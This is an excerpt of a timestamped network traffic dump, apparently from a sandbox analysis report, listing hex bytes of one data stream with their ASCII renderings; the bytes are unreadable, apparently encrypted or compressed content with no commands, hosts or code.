                  Data Ascii: MG;jzs<PI1?RIlCND#J[-z2{WS<d^TnNPdQr5D?[X{'W{B$(_zZ`q44bRD,:o(#XkdkMBjg^dr@PDAA|`f(d9b1T-7
                  2023-01-13 15:04:35 UTC1087INData Raw: 9e 00 e4 e3 be 8b 6c db 2c 9e 27 bf e7 51 96 2f 64 65 f8 e3 c0 ce e6 56 b0 53 4e 81 88 28 0e f7 dc be 0d ca 0b c0 0b dd 83 ea 9e 61 3a ad 9f b5 6c d8 88 fa 55 0f 08 f9 10 b8 9b c8 9d 7c 9f fb 43 55 51 44 ad cc b7 b6 8a c1 3a 3b 9e 7d f5 a4 d0 15 06 ef 48 f8 be 23 1d 27 4f 24 fa 01 d1 e6 16 f4 7d 3e 57 20 d7 04 f9 86 ba 9f 43 67 06 3e f3 ab 18 c2 1c 4e 5d b1 e5 7e b0 bf cb 0a 6e cc c7 78 63 d5 da cb 4b 91 00 f0 96 5d 0d 66 bc f5 41 bc e5 ed 98 9c ba 1b 3e 34 6e 84 bd 68 25 a9 ae 1e 2c a4 be d6 55 60 15 8a e6 f9 4f 0d d8 5a a7 b4 d6 b4 5e 02 2b 81 3e 81 dd f9 52 b3 46 20 49 a5 ed 60 d0 4f e5 ae ed 5a bb 03 be cd 77 df 12 ba 40 be ac df 05 98 cd 07 49 12 a5 85 fc ea 00 dc 67 66 f8 7c be 2c e5 39 e3 d9 39 e8 da 44 ff 6d 03 13 0f 67 31 df ec 95 97 3e 78 f9 b1
                  Data Ascii: l,'Q/deVSN(a:lU|CUQD:;}H#'O$}>W Cg>N]~nxcK]fA>4nh%,U`OZ^+>RF I`OZw@Igf|,99Dmg1>x
                  2023-01-13 15:04:35 UTC1095INData Raw: bc ec b5 ac ba b3 b6 4e 99 38 72 38 be 46 37 01 cd 09 6b 0c 53 4b 6a ed cf 56 34 c9 3c c9 f8 51 81 3c 37 03 bd da a9 3a 05 e7 b7 35 f6 aa 48 b5 a4 c1 6e df d7 5a bb 61 5e 51 10 71 fa 6d 39 0e c6 d7 ac 79 5f 8d ab b5 2e 5b ef 8c df 4c 6e 0a ef 6e 16 0a 3d f8 9e 39 8f 24 d6 79 ed 20 42 f1 40 dc ad 22 7d 84 8e 99 bc 0c ed f7 4c 5c 0d a3 c7 6d 15 be cd b0 c7 9e ff 58 85 38 a1 66 dc 0b 33 50 e3 e4 2b 6c 82 f2 32 13 5e e6 0e cc 3c 7b 9c 7f 73 47 8f 50 9c 49 b8 69 d3 49 3f 34 a5 32 b6 e4 88 9c aa 69 3a 54 56 b7 ad d1 3f 9b d4 6c 9b 24 f2 8d 2b c0 cd 64 72 e2 d2 16 2b 83 23 25 65 8b ef ee 3c 28 18 21 f2 9a 34 47 16 68 f2 03 4b cb 6e 49 59 25 6e 71 47 b9 0d 28 04 07 18 cc 31 83 36 f8 3d 3e 39 6d 11 69 2a a0 71 09 1e 0b 39 95 0e e0 c1 34 a1 4e 51 44 8f ee b3 c1 f7
                  Data Ascii: N8r8F7kSKjV4<Q<7:5HnZa^Qqm9y_.[Lnn=9$y B@"}L\mX8f3P+l2^<{sGPIiI?42i:TV?l$+dr+#%e<(!4GhKnIY%nqG(16=>9mi*q94NQD
                  2023-01-13 15:04:35 UTC1102INData Raw: 1c 70 5b fa fc 92 dc 2c ab 30 27 f0 8c 05 ec 2a 7a 70 e7 cc e2 74 ec 4d f2 7c 1f e6 2f 7b 09 91 8f e4 ce 11 84 00 87 f2 98 26 ee e4 85 96 8c 86 db 43 47 78 15 4e 1b 58 36 f7 46 21 81 23 9b 76 4e ce a2 17 e7 2f 09 06 90 48 19 32 3b a1 e5 21 52 0e 14 35 94 4b 77 18 96 80 68 4a 19 74 bc 18 32 d4 f4 57 f5 d9 42 b0 db 98 58 de e8 5e 92 f8 70 0f 78 5f 31 5c 74 7e cd 9a 67 23 18 b2 cc a2 fa 78 90 96 f1 2f b3 a4 aa 53 a8 8e 7f 63 7f 60 6f 8a 2b d5 ac e4 1b d8 0a 2c c4 79 08 ab 99 20 bb 7f db c6 fc a7 a3 51 16 c1 a5 01 67 fd 06 8b 42 3b d5 61 44 b8 d9 89 32 c5 58 48 c5 50 d4 d4 31 a4 5d d8 06 c3 86 99 4e 72 84 f1 2e 47 9d ab e6 c1 1c 53 d8 ee 4f 34 3b 05 12 be 97 20 79 64 9d fb 85 ef 39 bf cd 3d 91 9f 4f 78 1f 0f b2 7b 95 8d af 9e ae 29 aa d8 ff 27 bb ee 62 9d 5f
                  Data Ascii: p[,0'*zptM|/{&CGxNX6F!#vN/H2;!R5KwhJt2WBX^px_1\t~g#x/Sc`o+,y QgB;aD2XHP1]Nr.GSO4; yd9=Ox{)'b_
                  2023-01-13 15:04:35 UTC1110INData Raw: 61 7a be 37 06 2c 8a fb 66 24 4b 72 24 92 f5 f6 96 0b 10 2f f3 3d 72 15 c4 84 ce 4b 75 3f 7b 70 5d c3 b0 db ff 46 6a 39 59 fd 48 14 6d b1 5a 4d d8 d5 fb bd 35 9f 2b 3b f3 8a 8c 7c 8c 27 b5 26 8c 9d 48 7d a3 ed 4f 4c d0 6b 88 b1 db ba 85 db 38 59 a7 f3 17 04 dd 86 9b dc a1 03 b0 ca b9 fb 71 43 4d e5 81 c4 36 56 11 f8 19 1a 54 58 17 a9 93 71 92 4c 21 f1 40 9a 78 76 ba d5 c5 6d 1a 13 d1 61 14 c5 0f 17 45 76 b8 00 c6 c8 4d 32 ae 13 bc b2 d5 b4 bd 5f 51 71 c9 87 3b 6d ca bd 2e 83 c5 dd 2b 8f bf 7c c8 4a 00 45 6b e8 a8 c7 33 58 66 08 dc 14 b5 8a ab 47 1f 61 85 b6 ad 18 4b 50 26 e0 0c 52 41 3f ea f6 c5 21 bc c5 7c b7 e3 a6 6b ca 25 79 80 2f 3a 33 c7 ce af bf 25 b7 99 3b d1 de 6c ae 27 89 c2 a7 6e cb 6a 3e af 72 f7 67 99 f5 f3 f3 2a 08 0d 54 a2 c2 4f 5f 2a 31 c0
                  Data Ascii: az7,f$Kr$/=rKu?{p]Fj9YHmZM5+;|'&H}OLk8YqCM6VTXqL!@xvmaEvM2_Qq;m.+|JEk3XfGaKP&RA?!|k%y/:3%;l'nj>rg*TO_*1
                  2023-01-13 15:04:35 UTC1118INData Raw: 4d d9 b1 c1 55 24 e4 68 c4 db 76 80 9d 68 93 fa f0 d1 30 a3 32 3a 7c 2b 77 1e f6 79 f0 4a 12 d5 c3 5f 59 14 f7 76 1f 68 2f fc dc cd 03 88 48 99 d0 ee 4a 2f 67 bd 9f b1 2a d9 6a d4 da 34 a9 9a e8 05 0f ae e6 03 4c 1c 5b b0 53 77 6a c5 3e e9 31 a6 41 99 97 83 b0 18 78 48 e0 fb 5d 7c 8a 16 18 24 e0 c6 42 1e 59 b1 d6 0a 6e 89 a8 6b c5 55 49 d6 98 42 0f 1d 1f 85 56 fb d2 56 0b a3 46 63 d3 e7 3d 9a d5 36 4f b3 02 5e f9 e2 17 d3 0b ec 20 e4 44 29 2f 2e e6 21 b5 8a e1 21 e2 f8 e2 58 d8 35 1a ce 07 0d c3 97 7c 86 84 8b 1e fd 1b 03 f3 d4 c3 72 60 0c 71 63 91 0e 53 55 52 93 19 94 67 6a d6 fe 3b f9 48 aa da 6d 95 cc 79 5e 25 e3 84 13 e6 c3 1f cf 3c ca 35 0a 12 e6 59 71 05 9b 0c 84 eb dd fc 4d ea 36 91 bc 0b 69 ea 63 01 7b e7 6c c8 9d 10 36 e1 53 dc f2 a0 30 e2 c5 0b
                  Data Ascii: MU$hvh02:|+wyJ_Yvh/HJ/g*j4L[Swj>1AxH]|$BYnkUIBVVFc=6O^ D)/.!!X5|r`qcSURgj;Hmy^%<5YqM6ic{l6S0
                  2023-01-13 15:04:35 UTC1126INData Raw: 07 bf 11 7b a5 35 0f 1f 8a 23 c8 08 7f 00 4e 24 8f ca ec 39 db dc b4 3a 26 b5 ac 55 11 ce e4 33 de 00 76 e2 04 a2 3f be 77 83 85 ab fc f2 27 9d fb 16 cb 99 3b 3b 52 93 f6 5f 71 f0 52 b0 b3 db 49 db 55 fb d6 24 c3 a0 b1 22 f4 98 c3 8a 93 ed fc 75 af fe 8c 46 04 fd 70 15 79 1e 1d 9c 69 f4 ee 1b ee 26 de 36 37 72 7a 3a f7 8d 47 39 4f ea 0d ef dd ff a1 a1 96 ee 3a b1 01 91 04 3f ea e6 5f 38 b9 96 30 30 f4 6d 9d 92 a9 ca f3 2a 8b ae ae 12 49 01 c7 f1 bc bb 3b 9c 95 3d 9f c6 aa e5 d2 69 c6 82 63 1e 19 d2 4a 2d 3f 78 7a 8e 3b ff 2b bd c4 0e 47 e3 76 ac 78 05 43 b8 d1 2c 12 17 a9 69 bc 7a 70 5f 4d ca 77 de e3 2b ef 65 fc 92 0f 3a 0a a5 03 6c 9b fe 62 56 26 7f 57 88 1c 99 1d 3e 0a 0f e6 63 8f 61 77 42 fd 33 53 86 c0 92 8f 81 14 58 c7 fc e9 4d 0b 94 af 4e e4 7a 0d
                  Data Ascii: {5#N$9:&U3v?w';;R_qRIU$"uFpyi&67rz:G9O:?_800m*I;=icJ-?xz;+GvxC,izp_Mw+e:lbV&W>cawB3SXMNz
                  2023-01-13 15:04:35 UTC1134INData Raw: c9 72 1b 84 c8 06 c9 17 41 af 6a 4a c6 97 e5 9b 9e 09 2b 92 e7 42 b4 88 95 32 7a f8 f5 3a 6f 99 4c 3f 2a c1 b9 51 3d 4c 00 c5 46 55 d5 a9 3f c0 a2 e3 d8 3a 36 76 9e a2 a9 18 41 e5 76 c8 c5 36 bb b2 2f e1 25 94 26 7a e3 a8 82 01 97 53 db 36 6f 92 4b 05 7c 03 7e d4 66 95 e9 5a ea c5 25 7a b9 d5 e3 00 cf 77 2e 29 47 3c 72 ae 3c 1a 8c 8f f9 f0 43 5a ba 1a c9 ee b2 54 0f 78 95 6a 01 75 7b f4 49 9e e6 7f e8 80 b2 71 cb cc e9 a7 a4 69 a3 00 92 88 01 4a 90 64 47 d3 5d 88 60 a4 4a 79 f2 d3 ff ae bf 72 32 12 5c fd c6 78 28 fd 3b be f9 a1 a7 3e bf 68 aa d9 38 45 ae 9d 98 9c 1c 9f 60 ac 15 f9 72 bd 73 ac 0d 47 cf 94 9b 0a 63 de c9 19 0a 50 82 9c 5f 5e 1f f5 d2 b6 83 c0 0f 51 06 6e 9f 5c 80 27 15 3c ca f2 22 51 f6 cc d1 d6 83 a1 9d 7d e8 b2 95 09 58 06 e2 d5 49 39 e5
                  Data Ascii: rAjJ+B2z:oL?*Q=LFU?:6vAv6/%&zS6oK|~fZ%zw.)G<r<CZTxju{IqiJdG]`Jyr2\x(;>h8E`rsGcP_^Qn\'<"Q}XI9
                  2023-01-13 15:04:35 UTC1142INData Raw: cd 4c 88 c5 58 89 44 ab 20 a8 05 d4 5a 76 99 1a 83 70 65 ce 9b 80 6b 43 eb 4f 63 74 08 0a ee c6 4e f3 24 e4 2a eb 42 25 f2 22 50 fc 8e 6f ec 97 8e 3d 38 40 e9 73 46 c2 53 2c 6c e2 fa 42 49 b9 93 94 b4 41 ce 80 e0 d6 4b 63 c2 ad 1f 0f ad 4e f3 f1 c1 1e d1 5c d5 9d 1e 0a d9 c1 e6 9f d2 e0 e1 7d 32 78 34 fd 4d b0 3c 90 2b 2c ea 73 b7 3d c6 f1 37 5f 1b c4 26 17 90 b9 09 c1 f4 b4 45 8c 2f f2 d4 d9 25 1a e5 23 ec 2a 31 19 2e 86 4e 68 2c 6b 78 f1 5a 24 2a fd 17 ba 10 a7 63 86 7a bd 26 f2 86 ed ae 51 31 03 71 a7 82 43 1a 7e fa 5b 20 7a a0 6d 6d ef 15 1a e7 45 05 c6 6f 50 ba 76 7f 79 a8 ef e4 78 97 9e cd ae 0b 8c 96 f7 e6 13 06 78 d7 e2 b3 7d ff e2 c6 84 0b a2 66 cf 82 18 2b 7b 87 67 99 91 e2 01 de 9e 4b b0 43 7d 00 26 50 b4 a9 a6 78 3e cd 67 3e 47 aa 16 00 ac 3a
                  Data Ascii: LXD ZvpekCOctN$*B%"Po=8@sFS,lBIAKcN\}2x4M<+,s=7_&E/%#*1.Nh,kxZ$*cz&Q1qC~[ zmmEoPvyxx}f+{gKC}&Px>g>G:
                  2023-01-13 15:04:35 UTC1149INData Raw: d8 64 79 27 1e 2e d1 12 86 b9 3e b6 8b 5b 9d e4 1c e0 e4 c7 4f e1 4a b2 e9 a9 fb 19 1b 1c cf cf 05 06 68 50 72 d5 cc 36 72 81 b0 83 d9 1d 22 f9 6e e0 00 e2 87 91 76 f5 bf ad 49 2c 21 33 e9 5e 50 40 d7 23 44 e1 35 2a 23 7a d4 e7 ec 4a 51 ce fb bf a6 3c 53 7d eb 9b a1 ce 5c f2 f0 06 ea cd 6b 43 3b 41 1a ef 49 7a 1a 03 51 d2 c2 84 a4 c1 09 36 a5 fd 6b 1b 18 d2 4d 74 e1 ac ef ff ef 28 e2 26 ed 35 5d 61 69 fc 7d e3 e7 4f 26 1d 74 08 4a a1 a3 a4 38 98 e9 ff 08 1e 52 9c 8c 93 92 1e a1 e4 3d 57 83 e4 6a b6 e1 7e 1c be 60 88 f9 b2 49 5f 52 ed 2f 7e 54 4d 53 9d 5b ce d2 8a 33 bf 91 74 be 52 32 96 ac e3 84 f0 bb 6a 67 4f 6c ed 28 d7 f6 2f 4d 1a ae 8c 13 35 23 0e 35 78 1b cc 88 bc e9 2d c2 13 91 d0 f8 32 ab e5 d2 6f 54 fb 8a bf c2 9b de d0 49 16 6c 57 8e e3 fa bb 3e
                  Data Ascii: dy'.>[OJhPr6r"nvI,!3^P@#D5*#zJQ<S}\kC;AIzQ6kMt(&5]ai}O&tJ8R=Wj~`I_R/~TMS[3tR2jgOl(/M5#5x-2oTIlW>
                  2023-01-13 15:04:35 UTC1157INData Raw: 23 6c c4 2a d6 d3 71 63 48 05 80 82 a5 48 e9 06 79 f4 59 1c c6 d2 52 3c 6c ad 81 07 e6 19 28 8c 12 9d 7a 09 43 b4 d1 3e d1 98 5c e5 13 65 74 2e 9f 4e 96 6a 74 a6 64 19 70 1f fb c0 a4 b0 cb 8e 8c 2b b5 85 45 c5 ed 26 1d c3 c1 15 28 d9 9a 3e f6 06 6e 6a 81 67 61 65 77 92 56 0f 48 d1 40 03 ab c6 6e 3e 4a 51 bf 27 ef 89 de dc d8 84 1b b6 26 ea cc 61 87 c1 c5 44 28 53 81 e1 24 bc 7f b7 7a bd 05 28 f7 bc 0b 1b 98 f1 7a fa c3 3d 9f 62 18 1c c7 c6 e1 3a 84 c8 88 e0 af 56 dd 30 14 1c a8 79 16 66 cd e1 8f ac 97 a5 26 30 af 92 4a ef b9 49 41 53 e6 74 6f bd 90 36 85 63 db 61 e0 9b f4 d8 16 f3 bc 4b 5d a3 4e 45 53 be 58 5b 7d ac 12 0e 68 c4 47 f2 6b 54 58 81 45 1c c8 75 43 22 88 87 2a 0c c3 5b 36 38 e2 0e 00 7f 03 3c e4 25 48 39 81 76 2e 63 60 ea 94 b0 06 07 8c ff 6d
                  Data Ascii: #l*qcHHyYR<l(zC>\et.Njtdp+E&(>njgaewVH@n>JQ'&aD(S$z(z=b:V0yf&0JIASto6caK]NESX[}hGkTXEuC"*[68<%H9v.c`m
                  2023-01-13 15:04:35 UTC1165INData Raw: 3c 55 c8 5f 44 6b bf 16 41 2c 78 85 e5 26 63 35 40 8c 63 62 a0 57 da e0 9c 5f 9a 31 5e ac be 22 1e 82 38 21 98 ed a7 ac 63 09 a3 b4 d7 0d a8 78 24 2b 95 d1 43 79 bb b6 cb 4f fb c9 df bb 97 55 58 32 ae 3a b2 0d 83 3b 5d cb b5 40 19 c1 f6 dc cd e1 25 ff c1 ee 14 62 0e a9 b2 c5 ac 09 6e 49 3d f4 3c bb e0 ab 41 ec 10 0f b3 0c be 4e ee 81 57 23 3d c5 f9 8e c7 a5 f0 79 c2 e5 62 3f 9a 73 da 09 ac 64 4b 8c 1f 46 77 8b 8c 54 98 78 18 99 6c a1 05 9b d6 26 8a 39 5b 1f d6 8c 0d 08 72 69 4d e7 35 0d a9 9e e4 4e 9a 25 08 ef 2f 10 a2 7e 71 dc 42 17 0b c5 78 42 50 a7 e2 79 c5 06 50 f8 6b 41 c1 ba da d9 e0 de 27 92 fe d8 de 80 3d de c7 02 17 e8 04 f6 0c 24 ac 7d 93 22 05 08 86 02 a2 3d ba 3b 2a d1 47 81 8a fd ae da c6 f6 07 f8 b1 ab a7 d8 eb d8 d9 5d 7e 3b d5 27 e9 0f 5a
                  Data Ascii: <U_DkA,x&c5@cbW_1^"8!cx$+CyOUX2:;]@%bnI=<ANW#=yb?sdKFwTxl&9[riM5N%/~qBxBPyPkA'=$}"=;*G]~;'Z
                  2023-01-13 15:04:35 UTC1173INData Raw: aa bf 6b 7b e8 75 e6 71 95 b4 eb 04 68 4a ba 37 5e ee fd 62 ae 45 7a f5 4b 26 4c 57 76 1e 91 57 6b e4 1b b6 ef 19 c8 23 be eb eb 58 1c fb c9 b9 06 1d 99 69 4a 8f f2 60 28 b9 52 42 c1 88 ef 0b ec f2 81 9c 9c 8a c3 d6 36 64 5c d6 d0 0b 78 03 da 15 23 99 0a 7b 19 90 6f 4e 40 e4 dd 8a a3 93 2a 71 7c 72 21 b0 c7 03 68 5c c9 2d f8 f3 9f c1 af ef bc 83 d7 73 57 18 e1 d6 33 cd 3c 51 3b 80 b3 41 8e 9c 4a 39 1b 37 25 f9 f6 22 c7 b8 5b 56 89 e5 02 f2 71 a4 62 16 31 cf 21 de f6 c5 77 99 0a 92 b1 21 c1 39 27 47 fa f4 2f 4c e4 41 15 ad f5 ab 2f ee e6 26 88 47 e0 3c 19 a0 82 33 af 58 30 21 f9 ee 55 7c f2 ee de 69 37 6e 42 59 33 e0 6e 09 ca d4 b1 5b a7 71 84 48 d5 1a 6e c8 a0 60 f8 c5 33 89 50 75 e9 5b 77 70 ec a6 83 df a3 91 df 3e c5 b5 71 db f5 5d 5d 16 83 9e 84 4b 79
                  Data Ascii: k{uqhJ7^bEzK&LWvWk#XiJ`(RB6d\x#{oN@*q|r!h\-sW3<Q;AJ97%"[Vqb1!w!9'G/LA/&G<3X0!U|i7nBY3n[qHn`3Pu[wp>q]]Ky
                  2023-01-13 15:04:35 UTC1181INData Raw: 78 fe 7c 33 b9 54 2c a7 dd 9f 5a 78 5e 35 f3 d9 62 d0 3b 74 8f 3e c8 a5 a8 47 d0 75 96 58 c5 54 a9 da dc f2 c1 05 32 40 13 a8 bd db c6 ba 16 3a 4c d3 24 ab da 52 10 ed 12 aa 3d ef d0 10 a3 85 2f c8 37 eb 8e 32 5d 5e 1d e3 a7 2f 27 b2 81 bd 88 79 e0 6e 9f 2f 88 d1 05 84 c8 ed 60 71 4a 03 dc 4a c0 5f 78 97 48 6d ed 73 ec a6 dd d6 7f 3a 16 fc 55 57 44 10 de 34 19 de f9 be ed f0 f2 9d f5 64 82 2e 72 2a 67 07 6f c9 65 cf 41 3c 33 6f f5 45 47 7f 38 09 ea 8d 5e ba a5 1c 2d c0 9f dd a8 25 a0 a2 e1 6e 28 df 1c e2 98 3e 4a c6 c2 cd 90 0d 9a 86 68 36 09 c6 16 2d ea 18 1d 83 70 59 17 62 ab c4 2c 65 00 3d 04 06 81 96 e6 97 53 b4 72 38 41 b4 f8 22 b2 84 ac 48 2e ce 28 35 d0 9d 74 00 b3 bb 01 8c 4e e3 d9 e9 ba 9c be 73 83 ee 54 ab 86 9f 62 44 8f ad 1e 79 5c c3 74 28 29
                  Data Ascii: x|3T,Zx^5b;t>GuXT2@:L$R=/72]^/'yn/`qJJ_xHms:UWD4d.r*goeA<3oEG8^-%n(>Jh6-pYb,e=Sr8A"H.(5tNsTbDy\t()
                  2023-01-13 15:04:35 UTC1188INData Raw: 2b 05 b5 f9 cd eb 8b c1 96 31 c6 e7 14 32 4d 5d 13 26 da 61 fc f1 18 e4 3b 50 55 57 ba 6c 33 00 1d d3 5d 3e d3 95 d7 0e de ec e4 ef d6 03 e2 7f 5d 1f 67 a6 ee 77 08 c4 21 da 20 ad d5 ae e5 82 87 85 a3 97 03 64 f5 73 76 9d 47 6b 84 29 af 05 af 1d 85 b8 ca dd da 32 58 f1 2c ee a2 76 78 ff a0 a5 24 4c d8 f3 20 95 f4 a5 42 dd c6 d3 d6 10 6c 41 10 3e 9a 2f 73 f9 28 ca 01 12 5d b9 61 90 6c 25 79 2f 5a 48 39 93 b3 8f 3d 12 00 39 94 42 78 7d 38 64 55 a2 36 b9 1e ec e3 7f 7f e9 00 7b ef ce 5e fa 2f 71 9d ec c0 8f 0e b2 02 90 06 1f 01 10 96 9f 99 47 ff c5 64 65 6a 86 37 da ba 62 42 cf 4a fb 75 6c 72 7a da d1 1a f5 7f 11 d1 5a 29 ae 6e 63 2f dd 76 c8 2f bd 6d de fc 8c c5 82 3c 3c 1d e4 c8 1d cd fa 44 bc 22 fb 0b 29 8b a0 44 09 25 0c 64 0a ff 74 63 6d 10 23 65 a3 d5
                  Data Ascii: +12M]&a;PUWl3]>]gw! dsvGk)2X,vx$L BlA>/s(]al%y/ZH9=9Bx}8dU6{^/qGdej7bBJulrzZ)nc/v/m<<D")D%dtcm#e
                  2023-01-13 15:04:35 UTC1196INData Raw: c6 ab 5e 64 02 67 59 2e 3d 62 69 03 93 ba fc 91 df e9 9c 8d ac 33 aa 81 8d ce f0 1c 98 51 1c f2 f2 be 74 61 9d 6b 0b d3 f1 cd f1 77 67 14 ce 33 11 91 e8 ad c1 58 4a 77 b8 7c 18 a5 68 2f 7d 2b 58 52 0b c5 31 9d 1b 0f cd 38 3a 21 93 a3 57 6c 85 6a af 37 07 98 c4 7b 19 34 91 5f d3 55 5a 29 17 5d a4 08 cd 83 70 14 de eb b2 97 16 a5 a1 11 e2 1b 91 64 04 db 8e dc 22 4d eb 2e 99 9a 66 e9 4c 7f 86 3c eb e3 aa 3f 4f 1f 0b 3f fb f8 43 a8 4c db d6 04 9f 4a 91 58 13 ad b1 46 73 4a f5 5b b8 a0 4b f0 e0 bd 3c ad f2 27 5c 2c e4 c2 d5 54 84 e7 da 9c 63 07 2c 82 e8 37 74 4a bb d4 5b af ea 77 8c 18 19 95 c5 9f 99 ef 2d f1 d6 49 4b 18 5b db 10 4a bb 23 e4 7b 1d 29 4b 40 87 65 f3 04 43 da 1d 2d 3f 19 51 78 cf 38 d6 ee 3c bd 8c 43 7e 8e 10 78 3a b3 90 84 7f 41 48 77 2b 8f 25
                  Data Ascii: ^dgY.=bi3Qtakwg3XJw|h/}+XR18:!Wlj7{4_UZ)]pd"M.fL<?O?CLJXFsJ[K<'\,Tc,7tJ[w-IK[J#{)K@eC-?Qx8<C~x:AHw+%
                  2023-01-13 15:04:35 UTC1204INData Raw: ce 6a 92 5a 41 72 78 48 06 a2 e5 9c ce c3 8d 5d 3a 39 39 31 10 3c 98 cb 48 ff df 17 45 58 94 83 08 40 7e 2d 25 1d ae ce 28 a8 e1 f1 a0 64 0b 0c 87 bd 6a 14 bb 25 c3 8c f6 7a 2d 72 83 33 72 da aa 51 04 56 12 54 d2 4c 4f 5e 77 84 07 d7 47 c5 7b 7f 02 dc 2b a2 70 05 68 4d f5 00 bb e9 19 6d ae d0 55 4a b2 a2 00 06 76 62 a7 36 06 46 ca 31 0e 37 50 7e a3 e3 62 ba 7b 4f 2d ef ca 29 66 ff 5c ca 07 24 ad 7d e2 30 e8 f9 95 93 6e 03 f2 3e 75 9c 54 0c 62 03 71 b1 6c dd 7b 41 90 5a 1e 45 09 a0 8e b3 1b 2a 49 87 53 f5 7e 2c e5 d6 fb 05 84 5c c0 42 a5 e6 cc 6b be fc 4c 50 ee d3 ac a3 2f fe 21 81 c9 f4 44 37 cc 6a cc d8 ac 5a 33 ee a9 b5 76 a1 2e 62 a3 b0 cd 96 a6 88 31 08 14 a3 9a fa b1 a5 5c e3 27 56 bb e1 44 a6 0f 13 79 d7 b9 6c 64 33 c2 8f fc 0e 7a fb 84 1b 6f dc cd
                  Data Ascii: jZArxH]:991<HEX@~-%(dj%z-r3rQVTLO^wG{+phMmUJvb6F17P~b{O-)f\$}0n>uTbql{AZE*IS~,\BkLP/!D7jZ3v.b1\'VDyld3zo
                  2023-01-13 15:04:35 UTC1212INData Raw: 5e 43 95 62 17 ad 2c 88 93 ee 97 63 2f 4c 43 0b 1f f5 1f fd d7 66 80 31 2f 97 ff 26 e1 bc 83 34 e7 eb 6d 05 3f d2 c8 f0 57 ce b3 2d f8 97 36 ae bd 32 75 2c 49 b6 af 0a 56 b4 67 a4 d8 9d 54 11 81 36 f1 27 69 47 7d 3e 45 28 2a 44 a9 36 86 e7 14 a3 91 8b ca 0b 55 f8 52 91 32 fe bd ef cb 20 b1 a4 d5 0f 3f 1e 43 d4 0f fe 13 47 8b 1c b5 20 4b d1 eb 8b 83 c8 47 b3 dc 29 e6 80 cb 54 18 3d db 22 6d e6 50 e3 b8 30 c9 8d 86 14 ec 88 c4 75 83 c6 25 3a 92 d2 a4 1e d2 a6 8c 96 a5 4c 8c c3 d3 e0 d0 e2 06 dc 3e 83 31 c0 bb 63 30 4d 0a 33 4d 3d c6 c6 20 8e 1d 29 e1 38 a8 73 16 29 30 5f 98 c3 9e 4e 42 61 8e 89 e4 f9 11 a2 c0 b1 e2 28 d0 c7 aa 64 93 35 78 e3 48 42 8e 57 16 8a 85 8f 27 96 17 c5 a1 aa cb 1b 5c 3b 7c e6 89 e5 19 ef e3 a8 22 92 2c 31 33 63 32 f3 71 ca de c3 41
                  Data Ascii: ^Cb,c/LCf1/&4m?W-62u,IVgT6'iG}>E(*D6UR2 ?CG KG)T="mP0u%:L>1c0M3M= )8s)0_NBa(d5xHBW'\;|",13c2qA
                  2023-01-13 15:04:35 UTC1220INData Raw: 91 31 c1 ae ab 9c 43 2f cb 51 f1 86 e4 93 a1 1d a0 38 95 83 41 af 9d fc 12 14 fb 1a 5f e6 e5 5d 38 01 ca 71 a4 5b c8 a2 17 d1 91 1a 26 38 d7 82 52 1d 80 09 4c df 0f e7 c2 f1 70 a0 be 96 27 6c d6 e5 09 07 f8 e5 ec e7 7f 3f f4 16 ea eb 9c 91 b6 bc b5 aa 97 aa f8 d5 53 3e c5 63 71 fe b0 c0 36 ae 52 ed 13 8a 73 98 98 d1 fd 0e d4 b3 30 cc 57 0c 9f 5b f9 de 5d a8 c4 24 c2 47 e4 e4 dd e4 83 56 26 af 1d d0 51 fc c9 8b dd e1 a9 24 74 df 77 b0 e3 44 c0 77 75 ce 3b 46 e3 db 4e 33 e0 0e 5d 95 84 b9 47 c1 46 48 dc 4d 17 c5 d2 0e b0 f7 ae d3 50 31 b4 72 6a 53 3a ef a1 db 97 7c 61 18 bb bc c0 bd cc 78 d3 ba 95 28 58 76 06 ed f2 3d 25 32 87 82 96 6d db 84 bb 37 d9 17 47 9f 9f 2e 69 55 10 21 31 a5 b1 ce 76 88 6d e5 ff 7c 66 63 22 f4 75 2e 04 d9 8b d6 15 91 78 5e 8e 11 a4
                  Data Ascii: 1C/Q8A_]8q[&8RLp'l?S>cq6Rs0W[]$GV&Q$twDwu;FN3]GFHMP1rjS:|ax(Xv=%2m7G.iU!1vm|fc"u.x^
                  2023-01-13 15:04:35 UTC1227INData Raw: 7c f3 b8 98 83 24 b0 6e 05 d9 6e e9 94 f7 b0 5b 33 b3 4b 4b 79 a5 5a dc 1b 83 a7 2e 97 1d e8 e9 89 16 25 75 47 cd 77 1e cf 3d f3 da cf f7 df dd ec 6c ad bd b2 97 5f 1e df d4 64 9f fd c2 87 28 9e 2c 3d 2a 9e 93 92 bb fc 96 57 36 d9 b2 4c 6c b3 1b d9 2e 05 5c 9a 6c a5 3c 3f d4 a7 5d 70 82 77 eb f3 05 73 60 75 20 ed ab ae 04 95 e6 17 c9 b5 4f ee 43 f8 2e b5 95 48 28 c2 08 ae 95 1a 15 e0 8c fa f0 1c 28 c4 87 bf f7 f4 97 f3 f8 c5 28 0b eb 0b 7a 86 7e 25 ad 79 5d 3e d4 e5 e2 05 37 e4 ad 1f 86 8e 51 67 3a 97 0c f0 a1 6b 0c 70 ad a0 9a 20 b6 bb 25 6d 27 59 97 d9 b6 b6 be d9 ec 3e ec 3a 21 2d ac e2 7f 00 d9 7a 97 3e 1c 76 15 90 df ee 24 f4 42 77 45 fe 7a 5e e9 9d de ea 50 67 15 ad ad 07 6d 57 33 4e 5a f5 e5 88 af 11 04 c2 bd a3 5f f0 51 22 3a 46 ea 8d e2 85 1a 23
                  Data Ascii: |$nn[3KKyZ.%uGw=l_d(,=*W6Ll.\l<?]pws`u OC.H(((z~%y]>7Qg:kp %m'Y>:!-z>v$BwEz^PgmW3NZ_Q":F#
                  2023-01-13 15:04:35 UTC1235INData Raw: dd bb 20 7f c1 ef 82 be 21 ad 9c 70 99 99 f9 36 60 f2 b7 e7 aa cd 36 9b 33 9f f1 ad 1b 47 b1 8e 22 6c 9a df fa bb f2 11 b3 18 fd 68 f8 0e ab 1c b9 90 ab 74 9c 0e 47 b1 25 58 7c ac cb 4a 85 d5 54 6c 73 6f 53 fb 23 33 53 f1 c7 da e8 47 4f d6 6b c3 ea fc ba 4b 8f ed 2c 8b af 46 f7 72 6f 3b db b7 f1 48 4b 38 51 74 65 05 50 f0 13 61 cd 04 3e 78 c0 23 7c 02 fe a0 fd 0d 48 05 a8 ff ec f0 90 a8 d9 70 7a 29 4f 57 cd 32 05 7f c3 4d 9d 57 22 f9 d0 a2 87 a3 fa 86 d2 b7 c8 19 d1 37 20 68 1c 3d 24 30 c3 7a ef f5 d6 9f 62 3c e9 62 1c 33 2a bc 17 b3 bf 60 17 f0 74 49 70 ed be 21 fb 21 4a 90 78 3a ab fb d1 82 e7 76 1f e2 f7 6c cf 79 9b f6 05 7e 86 